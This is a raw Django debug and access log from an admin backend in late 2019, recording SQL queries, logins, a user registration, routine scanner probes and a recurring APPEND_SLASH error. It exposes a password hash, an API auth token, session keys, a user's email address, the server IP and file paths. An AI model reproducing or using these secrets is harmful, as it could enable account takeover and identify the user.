'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 15, 4, 6, 383600, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:04:06] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 15:04:13,036 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:13.027137+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 4, 13, 27137, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 15:04:13,040 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx'; args=('resfx',) DEBUG 2019-11-28 15:04:13,347 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T15:04:13.345669+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 15, 4, 13, 345669, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:04:13] "POST /login/?next=/ HTTP/1.0" 200 1947 DEBUG 2019-11-28 15:04:21,042 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:21.030778+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 4, 21, 30778, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 15:04:21,047 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx'; args=('resfx',) DEBUG 2019-11-28 15:04:21,348 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T15:04:21.346977+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 15, 4, 21, 346977, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:04:21] "POST /login/?next=/ HTTP/1.0" 200 1947 DEBUG 2019-11-28 15:04:39,700 utils 18694 139696059688704 (0.003) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'resfx' LIMIT 1; args=('resfx',) DEBUG 2019-11-28 15:04:39,702 utils 18694 139696059688704 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'resfx@gmail.com' LIMIT 1; args=('resfx@gmail.com',) DEBUG 2019-11-28 15:04:39,981 utils 18694 139696059688704 (0.002) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$EJnk8Ciscafa$q60ihbkzQih68pY5vbBVPewM/BXnwgxUzQeSw71ICwI=', NULL, false, 'resfx', '', '', 'resfx@gmail.com', false, true, '2019-11-28T15:04:39.703294+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$EJnk8Ciscafa$q60ihbkzQih68pY5vbBVPewM/BXnwgxUzQeSw71ICwI=', None, False, 'resfx', '', '', 'resfx@gmail.com', False, True, datetime.datetime(2019, 11, 28, 15, 4, 39, 703294, tzinfo=)) DEBUG 2019-11-28 15:04:39,984 utils 18694 139696059688704 (0.001) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('631c9da065edb01987dc244a8c901a6352a0186f', 2, '2019-11-28T15:04:39.982623+00:00'::timestamptz); args=('631c9da065edb01987dc244a8c901a6352a0186f', 2, datetime.datetime(2019, 11, 28, 15, 4, 39, 982623, tzinfo=)) DEBUG 2019-11-28 15:04:39,990 utils 18694 139696059688704 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:39.988499+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 15, 4, 39, 988499, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 15:04:40,055 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T15:04:40.052996+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 15, 4, 40, 52996, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [28/Nov/2019 15:04:40] "POST /api/register HTTP/1.0" 201 5852 [28/Nov/2019 15:05:53] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:11:01] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:16:07] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:21:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 15:22:29,111 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:22:29.097663+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 22, 29, 97663, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:22:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 15:22:29,777 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:22:29.765391+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 22, 29, 765391, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 15:22:29,814 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T15:22:29.811835+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 15, 22, 29, 811835, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:22:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 15:26:17] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:31:23] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 15:36:25] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:41:34] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:46:39] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:51:44] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:56:51] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:01:55] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:07:02] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:12:06] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:17:12] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:22:13] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:26:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 16:26:50,471 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ybi5dmlkirxc4obgx5h7rzz47b4egemp' LIMIT 1; args=('ybi5dmlkirxc4obgx5h7rzz47b4egemp',) DEBUG 2019-11-28 16:26:50,473 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ybi5dmlkirxc4obgx5h7rzz47b4egemp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T16:26:50.471811+00:00'::timestamptz); args=('ybi5dmlkirxc4obgx5h7rzz47b4egemp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 16, 26, 50, 471811, tzinfo=)) [28/Nov/2019 16:26:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 16:27:22] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:32:30] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:37:35] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:42:36] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:47:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 16:47:11,357 utils 18694 139696059688704 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mpvvownainwubd8vgxk1mb3c9l3hyzey' LIMIT 1; args=('mpvvownainwubd8vgxk1mb3c9l3hyzey',) DEBUG 2019-11-28 16:47:11,359 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mpvvownainwubd8vgxk1mb3c9l3hyzey', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T16:47:11.358393+00:00'::timestamptz); args=('mpvvownainwubd8vgxk1mb3c9l3hyzey', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 16, 47, 11, 358393, tzinfo=)) [28/Nov/2019 16:47:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 16:47:44] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:52:51] "GET / HTTP/1.0" 302 0 [28/Nov/2019 16:57:57] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:03:02] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:08:03] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:13:13] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:18:17] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:23:23] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:28:30] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:33:34] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:38:40] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:43:45] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 17:46:29,127 utils 18694 139696059688704 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'seychzn8lws8fd053qm3t57x8om4eagu' LIMIT 1; args=('seychzn8lws8fd053qm3t57x8om4eagu',) DEBUG 2019-11-28 17:46:29,129 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('seychzn8lws8fd053qm3t57x8om4eagu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T17:46:29.127957+00:00'::timestamptz); args=('seychzn8lws8fd053qm3t57x8om4eagu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 17, 46, 29, 127957, tzinfo=)) [28/Nov/2019 17:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 17:48:50] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:53:50] "GET / HTTP/1.0" 302 0 [28/Nov/2019 17:58:58] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:04:06] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:09:13] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:14:17] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:19:24] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:24:28] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:29:31] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:34:40] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:39:47] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:44:52] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:49:59] "GET / HTTP/1.0" 302 0 [28/Nov/2019 18:55:00] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:00:01] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:05:05] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:10:20] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:11:24] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:15:26] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:20:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 19:22:09,043 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T19:22:09.030573+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 19, 22, 9, 30573, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 19:22:09] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [28/Nov/2019 19:22:09] "GET /robots.txt HTTP/1.0" 404 6408 DEBUG 2019-11-28 19:22:10,429 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T19:22:10.414936+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 19, 22, 10, 414936, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 19:22:10,469 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T19:22:10.466458+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 19, 22, 10, 466458, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 19:22:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 19:22:10] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [28/Nov/2019 19:22:10] "GET /static/admin/css/login.css HTTP/1.0" 304 0 [28/Nov/2019 19:22:11] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [28/Nov/2019 19:22:11] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [28/Nov/2019 19:22:12] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [28/Nov/2019 19:22:12] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [28/Nov/2019 19:25:37] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:30:45] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:35:49] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:40:56] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:46:01] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:51:07] "GET / HTTP/1.0" 302 0 [28/Nov/2019 19:56:13] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:01:19] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:06:24] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:11:29] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:15:02] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 20:16:35] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:18:12] "GET / HTTP/1.0" 302 0 Not Found: /echo.php [28/Nov/2019 20:18:44] "GET /echo.php HTTP/1.0" 404 6400 [28/Nov/2019 20:21:41] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:26:46] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:31:50] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:36:58] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:42:03] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 20:46:29,054 utils 18694 139696059688704 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'le2autplet9pyhow7pe87oqtrlmf13cv' LIMIT 1; args=('le2autplet9pyhow7pe87oqtrlmf13cv',) DEBUG 2019-11-28 20:46:29,055 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('le2autplet9pyhow7pe87oqtrlmf13cv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T20:46:29.054492+00:00'::timestamptz); args=('le2autplet9pyhow7pe87oqtrlmf13cv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 20, 46, 29, 54492, tzinfo=)) [28/Nov/2019 20:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 20:47:08] "GET / HTTP/1.0" 302 0 [28/Nov/2019 20:52:13] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [28/Nov/2019 20:53:35] "POST /editBlackAndWhiteList HTTP/1.0" 500 65504 [28/Nov/2019 20:57:19] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:02:25] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:07:30] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:12:36] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 21:17:29] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:17:42] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:22:47] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:27:53] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:32:57] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:38:04] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:43:11] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:48:16] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:53:19] "GET / HTTP/1.0" 302 0 [28/Nov/2019 21:58:27] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:03:32] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:08:39] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:13:45] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:15:15] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:18:50] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:23:55] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:29:02] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:34:08] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:39:15] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:44:22] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:49:28] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 22:54:31] "GET / HTTP/1.0" 302 0 [28/Nov/2019 22:59:40] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:04:44] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:09:51] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:14:57] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:19:58] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 23:25:08] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [28/Nov/2019 23:26:20] "POST /editBlackAndWhiteList HTTP/1.0" 500 65504 [28/Nov/2019 23:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 23:30:13] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:35:18] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:40:24] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:45:02] "GET /whm-server-status HTTP/1.0" 301 0 [28/Nov/2019 23:45:30] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 23:46:29,052 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v9fjqm2n5qgiawsjagbiw3u0nn8sumpf' LIMIT 1; args=('v9fjqm2n5qgiawsjagbiw3u0nn8sumpf',) DEBUG 2019-11-28 23:46:29,053 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v9fjqm2n5qgiawsjagbiw3u0nn8sumpf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T23:46:29.052416+00:00'::timestamptz); args=('v9fjqm2n5qgiawsjagbiw3u0nn8sumpf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 23, 46, 29, 52416, tzinfo=)) [28/Nov/2019 23:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 23:50:34] "GET / HTTP/1.0" 302 0 [28/Nov/2019 23:55:41] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:00:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:05:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:10:55] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:16:04] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:21:11] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:26:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:31:20] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:36:29] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:41:34] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:46:38] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:51:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 00:56:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:01:59] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:07:05] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:12:09] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:17:30] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:22:42] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:27:52] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:33:04] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:38:09] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [29/Nov/2019 01:41:59] "GET /proxy.php HTTP/1.0" 404 6409 [29/Nov/2019 01:43:17] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:48:18] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:53:28] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:56:22] "GET / HTTP/1.0" 302 0 [29/Nov/2019 01:58:36] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:03:39] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:08:48] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:10:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:13:52] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:18:59] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:24:06] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:29:13] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:34:18] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:39:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:44:35] "GET / HTTP/1.0" 302 0 [29/Nov/2019 02:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 02:46:29,093 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1ilxtiibvhyvvbv25oqgpttublbqdau8' LIMIT 1; args=('1ilxtiibvhyvvbv25oqgpttublbqdau8',) DEBUG 2019-11-29 02:46:29,094 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1ilxtiibvhyvvbv25oqgpttublbqdau8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T02:46:29.093397+00:00'::timestamptz); args=('1ilxtiibvhyvvbv25oqgpttublbqdau8', 